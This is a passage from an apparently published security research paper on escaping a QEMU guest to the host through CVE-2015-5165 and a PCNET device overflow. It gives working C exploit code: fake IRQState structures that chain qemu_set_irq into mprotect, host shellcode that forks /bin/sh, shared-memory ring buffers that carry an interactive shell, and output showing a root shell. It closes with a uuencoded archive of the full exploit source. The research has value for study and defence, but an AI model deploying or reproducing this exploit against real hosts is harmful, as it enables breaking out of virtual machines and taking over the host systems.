QEMU crashes as there is +no runnable handler at this address. + +(gdb) shell ps -e | grep qemu + 8335 pts/4 00:00:03 qemu-system-x86 +(gdb) attach 8335 +... +(gdb) c +Continuing. +Program received signal SIGSEGV, Segmentation fault. +0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0) +43 irq->handler(irq->opaque, irq->n, level); + +--[ 5 - Putting all Together + +In this section, we merge the two previous exploits in order to escape from +the VM and get code execution on the host with QEMU's privileges. + +First, we exploit CVE-2015-5165 in order to reconstruct the memory layout +of QEMU. More precisely, the exploit tries to resolve the following +addresses in order to bypass ASLR: + +- The guest physical memory base address. In our exploit, we need to do + some allocations on the guest and get their precise address within the + virtual address space of QEMU. + +- The .text section base address. This serves to get the address of + qemu_set_irq() function. + +- The .plt section base address. This serves to determine the addresses of + some functions such as fork() and execv() used to build our shellcode. + The address of mprotect() is also needed to change the permissions of the + guest physical address. Remember that the physical address allocated for + the guest is not executable. + +----[ 5.1 - RIP Control + +As shown in section 4 we have control over %rip register. Instead of +letting QEMU crash at arbitrary address, we overflow the PCNET buffer with +an address pointing to a fake IRQState that calls a function of our choice. + +At first sight, one could be attempted to build a fake IRQState that runs +system(). However, this call will fail as some of QEMU memory mappings are +not preserved across a fork() call. More precisely, the mmapped physical +memory is marked with the MADV_DONTFORK flag: + +qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK); + +Calling execv() is not useful too as we lose our hands on the guest +machine. + +Note also that one can construct a shellcode by chaining several fake +IRQState in order to call multiple functions since qemu_set_irq() is called +several times by PCNET device emulator. However, we found that it's more +convenient and more reliable to execute a shellcode after having enabled +the PROT_EXEC flag of the page memory where the shellcode is located. + +Our idea, is to build two fake IRQState structures. The first one is used +to make a call to mprotect(). The second one is used to call a shellcode +that will undo first the MADV_DONTFORK flag and then runs an interactive +shell between the guest and the host. + +As stated earlier, when qemu_set_irq() is called, it takes two parameters +as input: irq (pointer to IRQstate structure) and level (IRQ level), then +calls the handler as following: + +void qemu_set_irq(qemu_irq irq, int level) +{ + if (!irq) + return; + + irq->handler(irq->opaque, irq->n, level); +} + +As shown above, we have control only over the first two parameters. So how +to call mprotect() that has three arguments? + +To overcome this, we will make qemu_set_irq() calls itself first with the +following parameters: + +- irq: pointer to a fake IRQState that sets the handler pointer to mprotect() + function. +- level: mprotect flags set to PROT_READ | PROT_WRITE | PROT_EXEC + +This is achieved by setting two fake IRQState as shown by the following +snippet code: + +struct IRQState { + uint8_t _nothing[44]; + uint64_t handler; + uint64_t arg_1; + int32_t arg_2; +}; + +struct IRQState fake_irq[2]; +hptr_t fake_irq_mem = gva_to_hva(fake_irq); + +/* do qemu_set_irq */ +fake_irq[0].handler = qemu_set_irq_addr; +fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState); +fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC; + +/* do mprotect */ +fake_irq[1].handler = mprotec_addrt; +fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT; +fake_irq[1].arg_2 = PAGE_SIZE; + +After overflow takes place, qemu_set_irq() is called with a fake handler +that simply recalls qemu_set_irq() which in turns calls mprotect after +having adjusted the level parameter to 7 (required flag for mprotect). + +The memory is now executable, we can pass the control to our interactive +shell by rewriting the handler of the first IRQState to the address of our +shellcode: + +payload.fake_irq[0].handler = shellcode_addr; +payload.fake_irq[0].arg_1 = shellcode_data; + +----[ 5.2 - Interactive Shell + +Well. We can simply write a basic shellcode that binds a shell to netcat on +some port and then connect to that shell from a separate machine. That's a +satisfactory solution, but we can do better to avoid firewall restrictions. +We can leverage on a shared memory between the guest and the host to build a +bindshell. + +Exploiting QEMU's vulnerabilities is a little bit subtle as the code we are +writing in the guest is already available in the QEMU's process memory. So +there is no need to inject a shellcode. Even better, we can share code and +make it run on the guest and the attacked host. + +The following figure summarizes the shared memory and the process/thread +running on the host and the guest. + +We create two shared ring buffers (in and out) and provide read/write +primitives with spin-lock access to those shared memory areas. On the host +machine, we run a shellcode that starts a /bin/sh shell on a separate +process after having duplicated first its stdin and stdout file +descriptors. We create also two threads. The first one reads commands from +the shared memory and passes them to the shell via a pipe. The second +threads reads the output of the shell (from a second pipe) and then writes +them to the shared memory. + +These two threads are also instantiated on the guest machine to write user +input commands on the dedicated shared memory and to output the results +read from the second ring buffer to stdout, respectively. + +Note that in our exploit, we have a third thread (and a dedicated shared +area) to handle stderr output. + + + GUEST SHARED MEMORY HOST + ----- ------------- ---- + +------------+ +------------+ + | exploit | | QEMU | + | (thread) | | (main) | + +------------+ +------------+ + + +------------+ +------------+ + | exploit | sm_write() head sm_read() | QEMU | + | (thread) |----------+ |--------------| (thread) | + +------------+ | V +---------++-+ + | xxxxxxxxxxxxxx----+ pipe IN || + | x | +---------++-+ + | x ring buffer | | shell | + tail ------>x (filled with x) ^ | fork proc. | + | | +---------++-+ + +-------->--------+ pipe OUT || + +------------+ +---------++-+ + | exploit | sm_read() tail sm_write() | QEMU | + | (thread) |----------+ |--------------| (thread) | + +------------+ | V +------------+ + | xxxxxxxxxxxxxx----+ + | x | + | x ring buffer | + head ------>x (filled with x) ^ + | | + +-------->--------+ + +----[ 5.3 - VM-Escape Exploit + +In the section, we outline the main structures and functions used in the +full exploit (vm-escape.c). + +The injected payload is defined by the following structure: + +struct payload { + struct IRQState fake_irq[2]; + struct shared_data shared_data; + uint8_t shellcode[1024]; + uint8_t pipe_fd2r[1024]; + uint8_t pipe_r2fd[1024]; +}; + +Where fake_irq is a pair of fake IRQState structures responsible to call +mprotect() and change the page protection where the payload resides. + +The structure shared_data is used to pass arguments to the main shellcode: + +struct shared_data { + struct GOT got; + uint8_t shell[64]; + hptr_t addr; + struct shared_io shared_io; + volatile int done; +}; + +Where the got structure acts as a Global Offset Table. It contains the +address of the main functions to run by the shellcode. The addresses of +these functions are resolved from the memory leak. + +struct GOT { + typeof(open) *open; + typeof(close) *close; + typeof(read) *read; + typeof(write) *write; + typeof(dup2) *dup2; + typeof(pipe) *pipe; + typeof(fork) *fork; + typeof(execv) *execv; + typeof(malloc) *malloc; + typeof(madvise) *madvise; + typeof(pthread_create) *pthread_create; + typeof(pipe_r2fd) *pipe_r2fd; + typeof(pipe_fd2r) *pipe_fd2r; +}; + +The main shellcode is defined by the following function: + +/* main code to run after %rip control */ +void shellcode(struct shared_data *shared_data) +{ + pthread_t t_in, t_out, t_err; + int in_fds[2], out_fds[2], err_fds[2]; + struct brwpipe *in, *out, *err; + char *args[2] = { shared_data->shell, NULL }; + + if (shared_data->done) { + return; + } + + shared_data->got.madvise((uint64_t *)shared_data->addr, + PHY_RAM, MADV_DOFORK); + + shared_data->got.pipe(in_fds); + shared_data->got.pipe(out_fds); + shared_data->got.pipe(err_fds); + + in = shared_data->got.malloc(sizeof(struct brwpipe)); + out = shared_data->got.malloc(sizeof(struct brwpipe)); + err = shared_data->got.malloc(sizeof(struct brwpipe)); + + in->got = &shared_data->got; + out->got = &shared_data->got; + err->got = &shared_data->got; + + in->fd = in_fds[1]; + out->fd = out_fds[0]; + err->fd = err_fds[0]; + + in->ring = &shared_data->shared_io.in; + out->ring = &shared_data->shared_io.out; + err->ring = &shared_data->shared_io.err; + + if (shared_data->got.fork() == 0) { + shared_data->got.close(in_fds[1]); + shared_data->got.close(out_fds[0]); + shared_data->got.close(err_fds[0]); + shared_data->got.dup2(in_fds[0], 0); + shared_data->got.dup2(out_fds[1], 1); + shared_data->got.dup2(err_fds[1], 2); + shared_data->got.execv(shared_data->shell, args); + } + else { + shared_data->got.close(in_fds[0]); + shared_data->got.close(out_fds[1]); + shared_data->got.close(err_fds[1]); + + shared_data->got.pthread_create(&t_in, NULL, + shared_data->got.pipe_r2fd, in); + shared_data->got.pthread_create(&t_out, NULL, + shared_data->got.pipe_fd2r, out); + shared_data->got.pthread_create(&t_err, NULL, + shared_data->got.pipe_fd2r, err); + + shared_data->done = 1; + } +} + +The shellcode checks first the flag shared_data->done to avoid running the +shellcode multiple times (remember that qemu_set_irq used to pass control +to the shellcode is called several times by QEMU code). + +The shellcode calls madvise() with shared_data->addr pointing to the +physical memory. This is necessary to undo the MADV_DONTFORK flag and hence +preserve memory mappings across fork() calls. + +The shellcode creates a child process that is responsible to start a shell +("/bin/sh"). The parent process starts threads that make use of shared +memory areas to pass shell commands from the guest to the attacked host and +then write back the results of these commands to the guest machine. The +communication between the parent and the child process is carried by pipes. + +As shown below, a shared memory area consists of a ring buffer that is +accessed by sm_read() and sm_write() primitives: + +struct shared_ring_buf { + volatile bool lock; + bool empty; + uint8_t head; + uint8_t tail; + uint8_t buf[SHARED_BUFFER_SIZE]; +}; + +static inline +__attribute__((always_inline)) +ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring, + char *out, ssize_t len) +{ + ssize_t read = 0, available = 0; + + do { + /* spin lock */ + while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); + + if (ring->head > ring->tail) { // loop on ring + available = SHARED_BUFFER_SIZE - ring->head; + } else { + available = ring->tail - ring->head; + if (available == 0 && !ring->empty) { + available = SHARED_BUFFER_SIZE - ring->head; + } + } + available = MIN(len - read, available); + + imemcpy(out, ring->buf + ring->head, available); + read += available; + out += available; + ring->head += available; + + if (ring->head == SHARED_BUFFER_SIZE) + ring->head = 0; + + if (available != 0 && ring->head == ring->tail) + ring->empty = true; + + __atomic_clear(&ring->lock, __ATOMIC_RELAXED); + } while (available != 0 || read == 0); + + return read; +} + +static inline +__attribute__((always_inline)) +ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring, + char *in, ssize_t len) +{ + ssize_t written = 0, available = 0; + + do { + /* spin lock */ + while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); + + if (ring->tail > ring->head) { // loop on ring + available = SHARED_BUFFER_SIZE - ring->tail; + } else { + available = ring->head - ring->tail; + if (available == 0 && ring->empty) { + available = SHARED_BUFFER_SIZE - ring->tail; + } + } + available = MIN(len - written, available); + + imemcpy(ring->buf + ring->tail, in, available); + written += available; + in += available; + ring->tail += available; + + if (ring->tail == SHARED_BUFFER_SIZE) + ring->tail = 0; + + if (available != 0) + ring->empty = false; + + __atomic_clear(&ring->lock, __ATOMIC_RELAXED); + } while (written != len); + + return written; +} + +These primitives are used by the following threads function. The first one +reads data from a shared memory area and writes it to a file descriptor. +The second one reads data from a file descriptor and writes it to a shared +memory area. + +void *pipe_r2fd(void *_brwpipe) +{ + struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; + char buf[SHARED_BUFFER_SIZE]; + ssize_t len; + + while (true) { + len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf)); + if (len > 0) + brwpipe->got->write(brwpipe->fd, buf, len); + } + + return NULL; +} SHELLCODE(pipe_r2fd) + +void *pipe_fd2r(void *_brwpipe) +{ + struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; + char buf[SHARED_BUFFER_SIZE]; + ssize_t len; + + while (true) { + len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf)); + if (len < 0) { + return NULL; + } else if (len > 0) { + len = sm_write(brwpipe->got, brwpipe->ring, buf, len); + } + } + + return NULL; +} + +Note that the code of these functions are shared between the host and the +guest. These threads are also instantiated in the guest machine to read +user input commands and copy them on the dedicated shared memory area (in +memory), and to write back the output of these commands available in the +corresponding shared memory areas (out and err shared memories): + +void session(struct shared_io *shared_io) +{ + size_t len; + pthread_t t_in, t_out, t_err; + struct GOT got; + struct brwpipe *in, *out, *err; + + got.read = &read; + got.write = &write; + + warnx("[!] enjoy your shell"); + fputs(COLOR_SHELL, stderr); + + in = malloc(sizeof(struct brwpipe)); + out = malloc(sizeof(struct brwpipe)); + err = malloc(sizeof(struct brwpipe)); + + in->got = &got; + out->got = &got; + err->got = &got; + + in->fd = STDIN_FILENO; + out->fd = STDOUT_FILENO; + err->fd = STDERR_FILENO; + + in->ring = &shared_io->in; + out->ring = &shared_io->out; + err->ring = &shared_io->err; + + pthread_create(&t_in, NULL, pipe_fd2r, in); + pthread_create(&t_out, NULL, pipe_r2fd, out); + pthread_create(&t_err, NULL, pipe_r2fd, err); + + pthread_join(t_in, NULL); + pthread_join(t_out, NULL); + pthread_join(t_err, NULL); +} + +The figure presented in the previous section illustrates the shared +memories and the processes/threads started in the guest and the host +machines. + +The exploit targets a vulnerable version of QEMU built using version 4.9.2 +of Gcc. In order to adapt the exploit to a specific QEMU build, we provide +a shell script (build-exploit.sh) that will output a C header with the +required offsets: + + $ ./build-exploit > qemu.h + +Running the full exploit (vm-escape.c) will result in the following output: + + $ ./vm-escape + $ exploit: [+] found 190 potential ObjectProperty structs in memory + $ exploit: [+] .text mapped at 0x7fb6c55c3620 + $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10 + $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347 + $ exploit: [+] VM physical memory mapped at 0x7fb630000000 + $ exploit: [+] payload at 0x7fb6a8913000 + $ exploit: [+] patching packet ... + $ exploit: [+] running first attack stage + $ exploit: [+] running shellcode at 0x7fb6a89132d0 + $ exploit: [!] enjoy your shell + $ shell > id + $ uid=0(root) gid=0(root) ... + +----[ 5.4 - Limitations + +Please note that the current exploit is still somehow unreliable. In our +testing environment (Debian 7 running a 3.16 kernel on x_86_64 arch), we +have observed a failure rate of approximately 1 in 10 runnings. In most +unsuccessful attempts, the exploit fails to reconstruct the memory layout +of QEMU due to unusable leaked data. + +The exploit does not work on linux kernels compiled without the +CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case QEMU binary +(compiled by default with -fPIE) is mapped into a separate address space as +shown by the following listing: + +55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64] +55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ... +55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ... +55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0 +55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap] + +7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0 +7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM] +7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0 + ... +7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib] +7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ... +7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ... +7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ... + ... +7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack] +7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar] +7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso] +ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] + +As a consequence, our 4-byte overflow is not sufficient to dereference the +irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx) so +that it points to our fake IRQState structure (injected somewhere at +0x7fxxxxxxxxxx). + +--[ 6 - Conclusions + +In this paper, we have presented two exploits on QEMU's network device +emulators. The combination of these exploits make it possible to break out +from a VM and execute code on the host. + +During this work, we have probably crashed our testing VM more that one +thousand times. It was tedious to debug unsuccessful exploit attempts, +especially, with a complex shellcode that spawns several threads an +processes. So, we hope, that we have provided sufficient technical details +and generic techniques that could be reused for further exploitation on +QEMU. + +--[ 7 - Greets + +We would like to thank Pierre-Sylvain Desse for his insightful comments. +Greets to coldshell, and Kevin Schouteeten for helping us to test on +various environments. + +Thanks also to Nelson Elhage for his seminal work on VM-escape. + +And a big thank to the reviewers of the Phrack Staff for challenging us to +improve the paper and the code. + +--[ 8 - References + +[1] http://venom.crowdstrike.com +[2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf +[3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c +[4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf +[5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt +[6] https://blog.affien.com/archives/2005/07/15/reversing-crc/ + +--[ 9 - Source Code + +begin 644 vm_escape.tar.gz +M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-IC8V=^B"*S'?^WI$OL3]-1W:EY<(> +M/_O3'@I/FB3^DZ4)W?V\>YZQF`J>BC3FXAEE4$/)N6 +M_".:I#[^,=!`!C"(?PS?GA'Z +MIUBS]_P_C_]7XYF>K(TEKU:E&<^/KE]7=I>6X]G5_IH9S\I':Y.Q>KCF]*R< +M/%R2JY5=[K&"K/)V85=^M?*5L6X\L^2B\:88#<[:IT-"6+2WW/[W@A!29>35 +MJQW"VI;JM#NZZ!>#HCL$JO5DX@E%O$=PVB7^J=Y3)$F-O""L5JF`2<29EY7* +M&M[B:%22A;RRH[ES*UM6[Q>E,*%[.TY7HYPR7RM1>Z9QQ*?EGY+<@4 +M'-BO/LE1.1]=N5GUTWQLR/,[>0?W)(NIK1,@>%DY6(W_P\)*L`&^AQ?R'>CR +MY(MR.2IKJ/[U:Y+7P(C_3(%LLK+VYZHS]0UGG0R*XNUH4`S!FH.EE08WOT9- +MF5\;.U+]2Q6^@X@=)&NURL'!QLL7#.C`+-"^0W?:18E(@38_Y>Q"_JZS0>`. +M*D@",D/65/W^7[X#Y;6M'ES<0_H?#Z)5O9-?VXC[+<1W*L>SZKT!&>A_#AB^ +MW`4?()W:*:3!@3-@V7QA9]7#X\5RKH]7=N*.O9JI7!S626_4;_6ZG8]W^`'] +M*T)K!*0?+.QR.5]6#SW[H2@"T'H`:$3^5D,M?5*!%^'GDU[_X&;.K!^]]N5_]Z_LG/ +M]OS_-'T1WO[I4\`?G_]I$D7L;OY+$K_.>)S2?YW__Q//\?-*<[ZX78ZOKDM2 +MU34242;JY-Q>FS$9>I?KY$*N)^14+L<6NE2E`>9+_)ROR\IT +M;L8.>I,74"<2NAXTS^FX+*TAT'8_C0V\E-?0K*:^A +M14Y`DA>PJVMF]@P!=7HBQU.[!$"BQP:`HAT$[@P`U\P:C'K"ALK&!O+?L8$$ +MORIFKM=3.ROE76".`?,Y["SAV"GMSC6!%0@QT#@&%*,.-A`'"JKN2M_\9'>)`Y9+:SVF0-,8Y]/2Y\SLY`]JU6P +M?WC6'I!![W3XOM$O"+Q?]'OOVJVB14X^DN%909J]BX_]]INS(3GK=5I%?T`: +MW1:L=H?]]LGEL`<+AXT!K59[T.PTVN=%ZPBT@T92 +MO/-C\."LT>D\Z:6W_8&/)T6ETVZ<=(J@";QLM?M%<^C=V;XU`3FPKP/SY$71 +M;/N7XD,!SC3Z'V$>ZE=`YJ#XMTL@@DW2:IS#A#8@U<]``C%I7O:+Z-?#\/<`"?C>`M87H]KKH*B#4ZW_T0CT&"'Z=O#\K +M8!U"W*T@4@T/P0`0:PYWR4`?`#C<\9%TBS>=]INBVRS\;L]+>=\>%#6(57O@ +M"=I![?L&Z+ST+F.,P*KPNI.Q=8PD:9^21NM=VYL=B"L0^T%[DR>P-+ALGFW@ +M/JH\/Z[L7M)N5\>/+GBP-IW*6;A];2]JRX4\AJM2^?G[&XRWG[WW[=[QMJN3 +M,?3VO;5%>>TO)8]NEVH^GWS1-?3Q#?;QS?2I6^UZ!NW./(3A\.]VNCZZ/GSZ +M7NJ?W[F;DB^^GP;*S]Q1?^>>>D]Z]G'4;YS?D]*;;//#RM9PO!+)R?AJ!IUT +M-))E:,5V-*I6-\O5>P]JM:WP<(V:N^H*[H[3&O"J]7A2CF>CO9U[#A]I:/FC +M47@9C;96G+>[55DGJD:JOY(?*N3))[!5)>B2_GXK:R\_1PL"1\K3JC^@!6FO +M/=G?_)]OX>M+\EMM:QNTR'[1&IU#LZ;WP`>*,'T#;/ +M+KMOD0&V!V_AW@V!VMGN=7H@[ZR`!GSX`XWC[V/VDK+IZAJ&*?Q.Z10L.]PU +M!8B;O591]0>HQURNIA"IK_S7PQ$_H&CA-@;.-9G1%_#8(L']5=?$<_V +M_8\OG]`RNF@TWU87\G8REZ9.@LY??X!KZ.9'!S35CTPCO^!Q#G?XVJYLR,G= +M96_>`5P@_3WVZSOAM1>O_5[04=^3BQ[]]J1]G6&P\6H.J;:8P!^WGL&H"M]? +MO/:O8!.HJV[2(6P^KU5+`()\0W`![6RT6GTP=%A\&.)[;2K8;U&;^A.D<+=^NQBV"?A +MDOV$L`#V3H#ZPT[&XOQA2B:,;V4VN\7PP38AG.:BLD=QX8\EWQOXIW6$\C@S'R"C.Z3[1@:*J7JZ5A\][/;#O7P +MRW0/OTPWD)T.R&.R*-\GZSQ)ECTB>P/-^Q%9ND_6OF@.'DECCZ1=MO;HD.R1 +MM&'S*3*Q3_8P';Z$;!.,Q^PA+':VGMXGR])>P3EI88+_M7(PO&D8LZ1!S7?8 +M&.OD^#D9WL#0OM++\0)G?3A@5G.XH:R7)([4N*P=$1A,#IK7XT5S:K;<<5KW +M,IOSF1M?W:]R"JO]1ZL<:2_@VD.V$EHYZB^AK4#S&R_\U4)?6_WSODG.WQ+F +MRY^#(5LS@I@BN-'\AC3G?C@RY,YM0.D;,O67Q_EL%\%NQOPCU;XB?/?88S]J!,?LBQM]>[@4EX'`"PY2/2O-BLE[= +M0[=#C+0;U.^)IZ9O_0_)P7/FP?9K-\5,;=9H%M:&NVL<@W*R=L5T4=Z&-?9` +M6V<4]"W`FEV%WKK^S;M.HWLGB_*`MYU)-;&`M;9PX2-(8N!Z?G5UA]B&N7G] +M\V`]W3!'3S)CU%=`!%.*/WGV)`1/-A)H5-]L#/'R9N2I +M[M4UM+:+LE@N=U(V\H$+&_WUK-QNL.W&R1*`T')5;L,:-L[7,-!M-_AVX_;B +M^G9U#TATO]&83#8[=Y$_>+^4B]WN]!W.H;!Q?M,Z;T2)V-W@%*M:=>Q,\`'.\O;";W3ZUW<+V]/T=:'\^$I +M=%9>_WC]FD#N_43@O93J +M>US[";:N:_X?A>B-S!S96TVV0QG]S. +MYM.QG%3(\X.;G^(()JF;GR(1/N+P$189+`8JMEE@X8/B1X9_4_R;X%\>N`,1 +M_&457P,K_Q.5]C]O02K>_S/;QA'(H!_!1P`+`X5/'?Q)4YK&,/3X=VNI%2S2 +M_CW/:9XP)>O(D`JC..:0(1>Q3.($&:S@>2+CP&"-RK(X0H;<:)5) +MC@S4)#9G%AE2$YD\RP)#K@37D4(&JUBJE4&&5&61H2DR4.68R1DR,*-21@5* +M%5)!'W.HS<4J3QG/_'O&E>7,V,`@C30\1:G"&&.Y16V.&ZZ2A"%#;.(LT6E@ +MB(7.LP21$5PHF6E$S!D1N3R5R"!%HG.K`P.G+-$4&;>6*@N494*D2H0)#HA*9.;251RK*,X'1-4HIG1OT36JE78YS`C!$!D@LVLH3 +M,%2G&%VCC:!&HV]2&1:;)$>&2)@\IA*E)H`UI3%JTYE)$^A&_ETY0P5C(C`P +MQ1T@C@Q"Q9I'J$T[)?,D1\14I@SXX0)#1B.5Y8A,XFB29101TX("P`JCKAA5 +M-H]X8'#"I3I#9)),9%PS1$PS,,)(C+H20D0F-LBPR6ZTE6X2"Q,N,U%$%?IF +MG4D8C4(]I$RQ+,G05BJ44`E#9'*GG.42?;.9R@R/0SVD&4UU+M%6ZBAU>8S1 +MS07-99:A;Y91FV:@'H:G($XM2F:),)BEJRR*:.8`,&2`&FB>A'D2B +MJ,DU(L,BE=H\0<0RI:S*+$;=:045G89Z`(`-,P:188F1D>&(6*9-G&J'47<* +MDAR%<>&(3*151RR`1%3J3*)CC'JFBHIM`SUL&G>:&LNE5/0J#`1 +M-PT+FS17S$1YJ`G"YR@WT)F2PREIP`AE2B(3E +M&'5(/9I9$^IA`P;:*IEA>9PB,G%F,AUI](T[XUR4A'HP3"F1.K15"J4AMQ"9 +MV*F$PJ&'#)F*8L%#/1@XC"+HMC-&-!8VY=.@;9Y1#+$(]@/W4.HVV +MR@S<M!*,!5G*%5I`0G`4!O,(\Y$$A%+(!X6C`H, +MFNHTS5&J4E3QE*(VZ,01$PH12Q(*/%&H!YTH:!`*D5'@#%41(A8IQ1.98]03 +MK6)HJ*$>-!2T18GZ%N<0Y>*=:@'"6A'0J"M,()0!H,!,N0BYRE' +MWV(+!9V:4`_2&B8D1UL-S$<)W/B0`68V"C,#,J0FBY4+]2!S\,PF:*NQ2L$L +MB-'EJ8JT2]$WZ'2)^Z_VOK6YC1M9]'Z5?L7$ZR@4+=GS?JPBG_*-G7-2-XE] +M96?/5MD*:YX6;8K4.$X]IE +MO$"C`3BNS:^,JSA]FV_XKCY=K=?75WB.NX!E+%^3_EHY3DG[-EFS@'U9G:8\ +MEC"\?O$*8//^@M)]EG"]90@%+Z]AG>UZ]7;RXXB:M%+>7FNIQ9ND2[4?/E +MO-D4I1_BX[=REHH.%JKFK-H8-@8U3LGB5U/KF[/\^A^Q< +MTHKZ/%NN-A?`Z2]=%\>`;X"0%!?Q,EL@&RMI\?JU)!B3AE+LQIC@U?-LE;S) +MTPT:J0I@NEFK?N$=4OU+ZK?GJV6=^)J,A<6/4OT!U%\MWN5JPB*/RYQ;P3=Y +M5_.K?+:VBTS<[,V2]7M,.SQ1"\`V:-TM(#ORGT]?(*7$U1Q:P1ZJ4@X33JKL +M=+$J.3IL)S9[0 +MP!TJ/:&$5ADC+#GMST5I$FU%^$CHA>H>RMS35=]5L04W,7,R7;VNR=O/3 +MB_DBZQ2XS"]7ZP^D0EXMN6-X>=R;BX*\/Q<-\^+Y,A\H0G9U\ZH!VZ9'J9D> +M90_YR[[Q*OMF3=F>:*+ZLH>>VUHK)*%L<;/W(K-+)(&ERM<.5*O0T&@/(VHW +MMD&`[1TDR=X9$I'>P[4R%P9G,U]F^4UO"=VP*M#=H969VN&5F;5@J"C$&4-4 +M+.9+Z,W_])!165_+BWB=9[0[G\%.&^GR;K6`57^1&]AF`T0S"G?Z7GURO.UL +M[+MHC>=%J)D(LV71282:7G8-CM.?F:_7CJU4A>NU^IF^7FUXKV+H/K2B]%0VQ6^ZOF7Q)M96R74U:08?,A1ZZ;>V5N(C +M=JD=ZE7?3I2AE=W(5LN\N0=F"R6E5=4^#WL9O\UG\_4_7MKGG:JH,\IW70>, +MVM;II67:[KF^4+4";RV$2[DLA+UHV/>UNB3_$O/?5UIZGQH%Z7<>)//E@_+B +M3D.67%U\$$^*3#J"[AM3F-5O\R6;8K^;KS?72]CVW4\Q)^;71)MUO"P7;&I^ +M#22?;^9Y2;=[XV.Z?\O'=/*@P55=O.NT2?:B;C1E&??D!",TU8D+I'N^W[%0 +M?1]_*&><"<0CP\;I7)@7\B\X_L"`\-TQIY1X/2Z&>DE-$3_@3+"F9WVKM3'! +M'S3%*=GXTECRMWOW<)"F$\0+;<6D0R@WG0!:^5MY'(?%JL>%Z>753*4;MTK0 +M13:2?R8JC528J3`C-*:',<[XGKR$1X&YDWF;7[9]#KQZL8*ZXN5KX_4U +M-!%+G<%$??#?>#+"]Q*7P*'O".$3VIBUC255_/E,:Z+1IRF +MP.S*I3UUN[R$(9IO)D/+`7<7OAP_Q&43*,H_<+ED22-R?O?-5[.S)]\^^ON3QPV27,Z0,?&5(QS1C00A +M`/0(!M#`C-*(2^/R.KT@&58:5ZNRG*.9CGA9LQ322.WLCK.T,I_E)DR4U6Y* +MEJQ#=#KJ&/?RI(;5'0`%YD4NYK7XO6:*FD=&_`[H2>9&++WW,MI.[#V8TBC2 +M[H;,CO;>7^"Z.*GHBU9),^@\;J>WD)GF/\DX94`?*@-Z:/QD/'A`%D\&K`>8 +M`0![:N,T9M?'1HT.W\O^;.0@>:GY#5!EXK1!J%%*62""<7!@?*9,+7Z=>^O& +M[/V\S_]4.+1KA['`PCGJ!:L\02$AJ&CL&!V.\ST%=1-FCQ83X]YIG8J)^-2I +MG:90OIG5'9E370=1R#7YT:Q@ZRY^)@C8Q*8,=(VER;>0?DO.A>$64[)5_<>/ +M8G[##U7RL@I(97C2^B#'-[C]_6KYQ4;N+:Z7L#?!XI!Q`6POGXS5=>(&Z1?Q +M/+7BES*]X/KYLI_I9=/_=7Q/+/A0F1R_C._%R6D+W],D;(/T\/VGLWV%>)CM +MQ1CT%'^0OZ6 +M784:<$XK+"URB*NW:*+WZP.;/,M.Y1?8S[>S#B4@-(18J_=$OJ?P&S9--!K% +M&L^A!?&<7-P%VN.'Q.35+^)JK.1(/BN![X5AN<* +MPL*4(L\1@ECXZ`0HI;P:JK6_^]OT]/]J\C4[W:1DU><^RE4^-IJDJ"2'2F$N +M5XU9B[R]@R;(C:R_G>2D3!>7M<"OM`W?K(SU-:PK!1XN/E_/KPQZ![U:H!2F +MP:@T`Q.-7F&J_*#!DAK_C;&9H?38S&A7L9F19H?4-/,EM*1\:9\?H2ZH^@X% +MQ/>3[I@C*MY;3AD1KSOQ^C4"H.I`;=;Q0VKT$1'"0)4!C4FC!&I8F.I,-#%I +M&V6`[/?%)4=]MH19UBB$I\6C_3VM]@D_XOGCD?'=H\=_FSU^^O73L_]#PJ13 +M%79UPM0A+RO:?$&R_@*"CE3%G*93MTODS$5,VR:I:0;C1NY3X*#J3X'#=E)) +M`#YH0W-SAK*AUH%L1DZWI&+B6><2)_O-$7/0/)>X*%E.1TQF'&0IT:ZCTN+= +M)YTGH=U2D!6@5-.6DC35-7,7B8J7>Y-#WFW2-.Z4H+O)2=5IDA,]A6H:#)6J +M2:(OA;>5LCX3.-H<*"9KM*"<-5!.UHGE;'TYNL>O62++TEU6)RPF) +M\%WK!,+\.G4"(@UI4:(#,UDTX.KB5ZU@O/B!',_7<8IJ)5[_ +M)QV=_;3ZJNKKV"9FR\JG'+18;&U;XO;WL-="97(@#`DPB8^/D":L!V#S$J^7 